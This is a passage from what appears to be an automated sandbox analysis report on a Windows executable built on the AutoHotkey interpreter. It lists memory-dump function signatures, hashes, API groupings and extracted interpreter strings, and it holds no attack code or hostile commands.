                                                                                                                                                                              • Opcode Fuzzy Hash: 51661bb2cf983b565cfd099b713ffa3f709133dbbddd0663a07c2ea1ef1524b9
                                                                                                                                                                              • Instruction Fuzzy Hash: 2362BEB521069086EB27DB27E8507EA37A0FB4CBD4F489216FB9987AF5DB38C554D300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ButtonCheckedWindow$MetricsSystem$Rect$CreateCursorDesktopDestroy
                                                                                                                                                                              • String ID: Max window number is 20.$tooltips_class32
                                                                                                                                                                              • API String ID: 3110449058-1788364857
                                                                                                                                                                              • Opcode ID: 0b27ccaacbd8314323a05e7d977841d00f298fc040cb20789018843a15d2c003
                                                                                                                                                                              • Instruction ID: 0bb79d1198011170268ab7923c7ccd8400702616552b94f7f44d5e6b3ff0565f
                                                                                                                                                                              • Opcode Fuzzy Hash: 0b27ccaacbd8314323a05e7d977841d00f298fc040cb20789018843a15d2c003
                                                                                                                                                                              • Instruction Fuzzy Hash: 8EC18A72A14B108AF766CFA6E4447ED33B1F74D788F404129EF0A97BA8DB78854AC740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: -()[]{}:;'"/\,.?! $MZ@
                                                                                                                                                                              • API String ID: 0-3444663223
                                                                                                                                                                              • Opcode ID: 09fffdba6a8195919f83af6eb2167eaba5e483564d951849533ecf47c76682cb
                                                                                                                                                                              • Instruction ID: c29f562d7cab5bea44b72935ca9f29763466ead6333c1e0db54066da93b5165a
                                                                                                                                                                              • Opcode Fuzzy Hash: 09fffdba6a8195919f83af6eb2167eaba5e483564d951849533ecf47c76682cb
                                                                                                                                                                              • Instruction Fuzzy Hash: DC729CB2604A9086FB77CB27A8443EA3BA1B79DBC4F055116EFC947AB5DB39C545C300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                              • String ID: %s.%s$($, :=*)$, =)$A label must not point to a function.$Blank parameter$ByRef$Duplicate declaration.$Duplicate function definition.$Duplicate parameter.$Expected ":="$Invalid function declaration.$Missing ")"$Missing close-quote$Missing comma$Out of memory.$Parameter default required.$Parameters of hotkey functions must be optional.$R$Too many params.$Unsupported parameter default.$false$this$true$value
                                                                                                                                                                              • API String ID: 3215553584-2075026647
                                                                                                                                                                              • Opcode ID: 71b11f6403d811842af6c798f4db65de7c4730dc3e6fd3f988c25116d7a3cabd
                                                                                                                                                                              • Instruction ID: 0dc6292de5f321403c9fa5b60876519b84b0a4cb37be433627c4d933fc7d4600
                                                                                                                                                                              • Opcode Fuzzy Hash: 71b11f6403d811842af6c798f4db65de7c4730dc3e6fd3f988c25116d7a3cabd
                                                                                                                                                                              • Instruction Fuzzy Hash: 0662BD32215680A5EB769F67D5103E963A0FB4DBC4F84491AFB49576F9EB38CD81C301
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountFileFindFirstMessagePeekTick
                                                                                                                                                                              • String ID: %s\%s$*.*$MZ@
                                                                                                                                                                              • API String ID: 3229853114-565386798
                                                                                                                                                                              • Opcode ID: f996d88c252f17bc2606ea3e9563feefe87367f8167bde948f4f334a13cc471d
                                                                                                                                                                              • Instruction ID: 6df53c3f43b64ed8c40b2c8e2efa11f32cffb274d2805b93a791bccef2339406
                                                                                                                                                                              • Opcode Fuzzy Hash: f996d88c252f17bc2606ea3e9563feefe87367f8167bde948f4f334a13cc471d
                                                                                                                                                                              • Instruction Fuzzy Hash: 1BF1D072604A80A6EB629F26E4803E937A0F7987E8F514227FB6943AF4DF78C545C704
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$CloseCreateHandle$CountMessageMutexSleepTick$CodeExitPeekPostPriority
                                                                                                                                                                              • String ID: AHK Keybd$AHK Mouse$Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
                                                                                                                                                                              • API String ID: 493082617-3816831916
                                                                                                                                                                              • Opcode ID: 652bb92e32a0b45b6425e00cc36f58ac267e81628fc7aefccf2d625100a53112
                                                                                                                                                                              • Instruction ID: 1dda319ab042cc8fe276c0726840e46ef81407420c50d3b69a113d93ab68688e
                                                                                                                                                                              • Opcode Fuzzy Hash: 652bb92e32a0b45b6425e00cc36f58ac267e81628fc7aefccf2d625100a53112
                                                                                                                                                                              • Instruction Fuzzy Hash: E98157B5205B4085FA67DB63B8557EA22E0BB8EBD8F440119BB8A43AB0DF7CC594D710
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Object$CompatibleCreateDeleteReleaseSelect$BitmapPixel
                                                                                                                                                                              • String ID: $0x%06X$Fast$RGB
                                                                                                                                                                              • API String ID: 2743567915-452930595
                                                                                                                                                                              • Opcode ID: da6871d0fcf300cb9c70236895e8f8599affa2f6e80d488201a94ca78ff14123
                                                                                                                                                                              • Instruction ID: 37cbd059731a8065b7e5004384f0f1bee7bfcd2917f17e822fd089f37449f779
                                                                                                                                                                              • Opcode Fuzzy Hash: da6871d0fcf300cb9c70236895e8f8599affa2f6e80d488201a94ca78ff14123
                                                                                                                                                                              • Instruction Fuzzy Hash: 0942D3723087C08AEA329B26A4403EEAB91F78D7D4F854225BB9547AE9DB7CC445CB14
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AvailableClipboardFormat$_invalid_parameter_noinfo
                                                                                                                                                                              • String ID: <<>>$ERCP$ERCP$ERCP$ERCP$Len%d$Len%s$PCRE$PCRE$PCRE$PCRE$Pos%d$Pos%s
                                                                                                                                                                              • API String ID: 318711952-3016860513
                                                                                                                                                                              • Opcode ID: ec4781e8f696eb4df6729d4c2a390a0344066508ea9c713ddaf9cbb092e2a1c9
                                                                                                                                                                              • Instruction ID: 2eb7b5f93d8255c0cb7789fdf95b27af49f17121731f30f114309c88ad2b4012
                                                                                                                                                                              • Opcode Fuzzy Hash: ec4781e8f696eb4df6729d4c2a390a0344066508ea9c713ddaf9cbb092e2a1c9
                                                                                                                                                                              • Instruction Fuzzy Hash: 2442C272600A848AEB6ACF26D8503ED37A0F748BD8F844215FB5D4BBE5DB39CA45C700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$CreateForegroundIconicRect
                                                                                                                                                                              • String ID: 0x%06X$Alt$DISPLAY$RGB$Slow
                                                                                                                                                                              • API String ID: 1835368863-780868468
                                                                                                                                                                              • Opcode ID: 786ede4802a019af72d208448336b852d3cb5044ded765fa6dbeb16d4659140c
                                                                                                                                                                              • Instruction ID: 5083e7fded4b61d8a6d95924422643667071c9793b8c57561d13a2000fb7d9b0
                                                                                                                                                                              • Opcode Fuzzy Hash: 786ede4802a019af72d208448336b852d3cb5044ded765fa6dbeb16d4659140c
                                                                                                                                                                              • Instruction Fuzzy Hash: DB519F32208B8082FB6ADB27A4507DA6790BB897E4F440215BFA907BF5EF7DC5458B00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ButtonChecked$_invalid_parameter_noinfo
                                                                                                                                                                              • String ID: Check$Col$Focus$I$Icon$Select$Vis
                                                                                                                                                                              • API String ID: 1167183914-322541112
                                                                                                                                                                              • Opcode ID: eaed3126d2d78119f88ddcc0c18a29ebdfe19644d76a92d86d008aa2f5d9224a
                                                                                                                                                                              • Instruction ID: e96acd6f02400e9487429962b3ba41f1b4d865ff9001fc3d77fd87d685e828e3
                                                                                                                                                                              • Opcode Fuzzy Hash: eaed3126d2d78119f88ddcc0c18a29ebdfe19644d76a92d86d008aa2f5d9224a
                                                                                                                                                                              • Instruction Fuzzy Hash: 4902A03261469086FB66DF27E5403EA7BA4F78DBC8F544116FF4A47AA8DB3AC544CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ButtonChecked$Window$Long$IconicRectVisible
                                                                                                                                                                              • String ID: 0$0
                                                                                                                                                                              • API String ID: 297524919-203156872
                                                                                                                                                                              • Opcode ID: 942fd85ed9965ad314a90d8a0a8b1478ba02de9938592667941c0295e0d8dcf1
                                                                                                                                                                              • Instruction ID: 0f8372dbed939a69599ba3685493f6ecc13d346459a327b7946208a6b347526d
                                                                                                                                                                              • Opcode Fuzzy Hash: 942fd85ed9965ad314a90d8a0a8b1478ba02de9938592667941c0295e0d8dcf1
                                                                                                                                                                              • Instruction Fuzzy Hash: F0D1037262015182FB669B27DC50BF92292E74DBD4F649A21FF5F476F4DB78C9828300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: <>=/|^,:*&~!()[]{}"$ <>=/|^,:*&~!()[]{}+-?$ <>=/|^,:*&~!()[]{}+-?.$ =$'\;`$Ambiguous or invalid use of "."$MZ@$Missing close-quote$Not allowed as an output variable.$Out of memory.$Quote marks are required around this key.$The leftmost character above is illegal in an expression.$Too many var/func refs.$Unexpected %$_$#@$default
                                                                                                                                                                              • API String ID: 0-1590349257
                                                                                                                                                                              • Opcode ID: 12fee36f7b429e574e79b0241be997cdde90908a087831e471c4082a21f9047b
                                                                                                                                                                              • Instruction ID: febf30f66262b4072f17091d53e221a7bd04be7f61500095fc24dd6037d163ed
                                                                                                                                                                              • Opcode Fuzzy Hash: 12fee36f7b429e574e79b0241be997cdde90908a087831e471c4082a21f9047b
                                                                                                                                                                              • Instruction Fuzzy Hash: D1B2DE7660539185FB769B5790503FA66A1E7ACBC8F85802AFF89076F6E778CC91C300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ProcessThreadWindow
                                                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                                                              • API String ID: 1653199695-2988720461
                                                                                                                                                                              • Opcode ID: af0ae490bfa706dd4df400ccd2f8f0b53443cf4621feaa1e7369ee1b1783d993
                                                                                                                                                                              • Instruction ID: fef1b80c479ffb631e896bb2a4a656aa16d301bf8935b1fd13802965155cc47b
                                                                                                                                                                              • Opcode Fuzzy Hash: af0ae490bfa706dd4df400ccd2f8f0b53443cf4621feaa1e7369ee1b1783d993
                                                                                                                                                                              • Instruction Fuzzy Hash: F2519172314B4187FB6A9B27A85179E67A1BB89BC4F082024FF4A47FB5DF39C6458700
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: SendString$LabelVolume
                                                                                                                                                                              • String ID: \$close cd wait$closed$open$open %s type cdaudio alias cd wait shareable$set cd door %s wait$set cdaudio door %s wait
                                                                                                                                                                              • API String ID: 3382583479-1210049163
                                                                                                                                                                              • Opcode ID: 913b187aa5b9b5e252fce23aa64d5eb8760a3486f91e874d35c4a274f1e16616
                                                                                                                                                                              • Instruction ID: 0a41b2da1cd0aa6fdf13d02659ab20906403110e266a04b6f531d4e7b5db003a
                                                                                                                                                                              • Opcode Fuzzy Hash: 913b187aa5b9b5e252fce23aa64d5eb8760a3486f91e874d35c4a274f1e16616
                                                                                                                                                                              • Instruction Fuzzy Hash: 6951C47121464091FB62EB23A554BEA2360EB9D7E0F855532FB1A93AF5DF38C588C740
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
                                                                                                                                                                              • String ID: %s\%s$*.*
                                                                                                                                                                              • API String ID: 1500295794-3420517325
                                                                                                                                                                              • Opcode ID: f10bbfd2097663f08c5abbd5da8b83897529a08a847e97a00ba1a90912ed480e
                                                                                                                                                                              • Instruction ID: 17d415cb683f57c506936e8cd814376e17ae56f639a3e42e061eba51d8c6a65b
                                                                                                                                                                              • Opcode Fuzzy Hash: f10bbfd2097663f08c5abbd5da8b83897529a08a847e97a00ba1a90912ed480e
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E61A136604A8095EB629F26E4843ED73A1F3887E8F554227FB5943AF8DF78C585CB04
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
                                                                                                                                                                              • String ID: %s\%s$*.*
                                                                                                                                                                              • API String ID: 1500295794-3420517325
                                                                                                                                                                              • Opcode ID: b0206d709dadf015ed557c885c7366f6bdf9beee475ff4074c7390db81c51c09
                                                                                                                                                                              • Instruction ID: 8aa24f51dd5b4267e96774c514b7d2274ca71651ab8994a7e99465caa64c8407
                                                                                                                                                                              • Opcode Fuzzy Hash: b0206d709dadf015ed557c885c7366f6bdf9beee475ff4074c7390db81c51c09
                                                                                                                                                                              • Instruction Fuzzy Hash: 6B61B036604A8495EB629F26E4843ED73A1F3887E8F514227FB5943AF8DF78C585CB04
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
